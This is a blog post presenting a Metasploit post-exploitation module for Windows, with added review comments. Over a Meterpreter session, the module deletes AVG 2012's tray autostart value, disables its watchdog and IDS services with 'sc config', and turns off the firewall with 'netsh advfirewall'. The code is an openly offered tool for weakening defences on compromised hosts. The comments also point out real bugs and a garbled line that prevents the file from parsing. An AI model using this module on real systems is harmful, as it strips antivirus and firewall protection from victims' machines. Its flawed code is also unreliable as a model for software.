I was re-watching/restudying some of the videos for Metasploit Framework Expert. One video in particular, “Lesson 7: Post Exploitation Kill AV and Bypass Firewall”, made me decide to automate the task with a post-exploitation module.
##
# $Id: kill_avg_2012.rb 2012-05-12 02:19:00Z $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/registry'
# Post-exploitation module that needs an existing Meterpreter session.
# It reads and deletes the AVG 2012 tray autostart value under
# ...\CurrentVersion\Run, changes the Start type of the avgwd and AVGIDSAgent
# services with `sc config`, and optionally turns the Windows firewall off
# with `netsh`. Each of those is a host-visible configuration change
# (registry value deletion, service start-type change, firewall state change),
# which is exactly where a defender would put detection for this behaviour.
#
# NOTE(review): the listing as published has no indentation and line 23
# ('Version') contains a garbled closing quote (looks like a mangled HTML
# entity for "'"); as printed, the file will not parse until that is repaired.
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::Common
# Module metadata and options.
#   REBOOT (Bool, default false) - reboot the host after the changes.
#   KILLFW (Bool, default true)  - also run kill_firewall.
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Stop AVG',
'Description' => %q{ This module removes the AVG tray from starting in the registry. It also changes the startup mode of avg watchdog and AVGIDSAgent from automatic to disabled. },
'License' => BSD_LICENSE,
'Author' => [ '3vi1john Jbabio@me.com'],
'Version' => '$Revision: 20 ${body}#39;,
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptBool.new( 'REBOOT', [ false, 'Reboot', false]),
OptBool.new( 'KILLFW', [ false, 'Turn the Windows firwall off', true]),
], self.class)
end
# Deletes the AVG_TRAY Run value on 32-bit Windows.
# Only acts when the value equals the hard-coded default install path below;
# any other path (custom install directory, different AVG version) is reported
# as "already gone" even though the value is still present.
# NOTE(review): `rescue ::Exception` also swallows Interrupt/SystemExit;
# `rescue => e` (StandardError) is the conventional choice.
def rem_avg_tray_x86
begin
key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
value = "AVG_TRAY"
v = registry_getvaldata(key, value)
print_status "Checking for AVG Tray..."
if v == '"C:\Program Files\AVG\AVG2012\avgtray.exe"'
print_status "\tAVG_TRAY found; removing it..."
registry_deleteval(key, value)
else
print_status "\tAVG_TRAY is already gone..."
end
rescue::Exception => e
print_status "\tThe following Error was encountered: #{e.class} #{e}"
end
end
# Same as rem_avg_tray_x86 but for the WOW6432Node Run key and the
# "Program Files (x86)" path used on 64-bit Windows. The exact-string
# comparison has the same limitation as the 32-bit variant.
def rem_avg_tray_amd64
begin
key = "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
value = "AVG_TRAY"
v = registry_getvaldata(key, value)
print_status "Checking for AVG Tray..."
if v == '"C:\Program Files (x86)\AVG\AVG2012\avgtray.exe"'
print_status "\tAVG_TRAY found; removing it..."
registry_deleteval(key, value)
else
print_status "\tAVG_TRAY is already gone..."
end
rescue::Exception => e
print_status "\tThe following Error was encountered: #{e.class} #{e}"
end
end
# Reads the Start value (2 = automatic) of the avgwd service and, when it is
# automatic, disables it via `sc config`; then does the same for AVGIDSAgent.
# NOTE(review): `else v == 4` is parsed as a plain `else` followed by a no-op
# expression, so "already Disabled" is printed for every non-2 value, not
# only for 4. Also, `key`/`value` are reassigned for AVGIDSAgent but
# registry_getvaldata is not called again, so the second `if v == 2` is still
# evaluated against the avgwd Start value.
def rem_avg_services
begin
key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\avgwd"
value = "Start"
v = registry_getvaldata(key, value)
if v == 2
print_status "\tService avgwd is set to Auto..."
print_status "\tChanging avgwd service from auto to disabled..."
cmd_exec('sc', 'config avgwd start= disabled', 30)
else v == 4
print_status "\tService avgwd is already Disabled..."
end
key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\AVGIDSAgent"
value = "Start"
if v == 2
print_status "\tService AVGIDSAgent is set to Auto..."
print_status "\tChanging AVGIDSAgent service from auto to disabled..."
cmd_exec('sc', 'config AVGIDSAgent start= disabled', 30)
else v == 4
print_status "\tService AVGIDSAgent is already Disabled..."
end
rescue::Exception => e
print_status "\tThe following Error was encountered: #{e.class} #{e}"
end
end
# Turns the Windows firewall off with netsh, choosing the legacy `firewall`
# syntax when sysinfo['OS'] matches /Windows XP/.
# NOTE(review): `else sysnfo =~ ...` is again `else` plus a no-op expression,
# so the advfirewall branch runs for every non-XP OS string, whatever it is.
# The 30 passed to cmd_exec is the timeout argument used throughout this file.
def kill_firewall
begin
sysnfo = client.sys.config.sysinfo['OS']
if sysnfo =~/Windows XP/
print_status "\tKilling #{sysnfo} Firewall..."
cmd_exec('netsh', 'firewall set opmode MODE = disable', 30)
else sysnfo =~/Windows 7|Server 2008|Windows Vista/
print_status "\tKilling #{sysnfo} Firewall..."
cmd_exec('netsh', 'advfirewall set allprofiles state off', 30)
end
rescue::Exception => e
print_status "\tThe following Error was encountered: #{e.class} #{e}"
end
end
# Entry point. Dispatches on sysinfo['Architecture'] (the `else arch =~ /x64/`
# line is a no-op expression, so any non-x86 string takes the amd64 path),
# then honours REBOOT and KILLFW in that order.
# NOTE(review): REBOOT is processed before KILLFW; if the reboot command
# actually restarts the host, the session is presumably gone before
# kill_firewall runs — confirm the intended ordering.
def run
begin
arch = client.sys.config.sysinfo['Architecture']
if arch =~/x86/
rem_avg_tray_x86
rem_avg_services
else arch =~/x64/
rem_avg_tray_amd64
rem_avg_services
end
if datastore['REBOOT']
session.console.run_single("reboot")
end
if datastore['KILLFW']
kill_firewall
end
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
# Printed even when the rescue above fired.
print_status "\tDone!"
end
end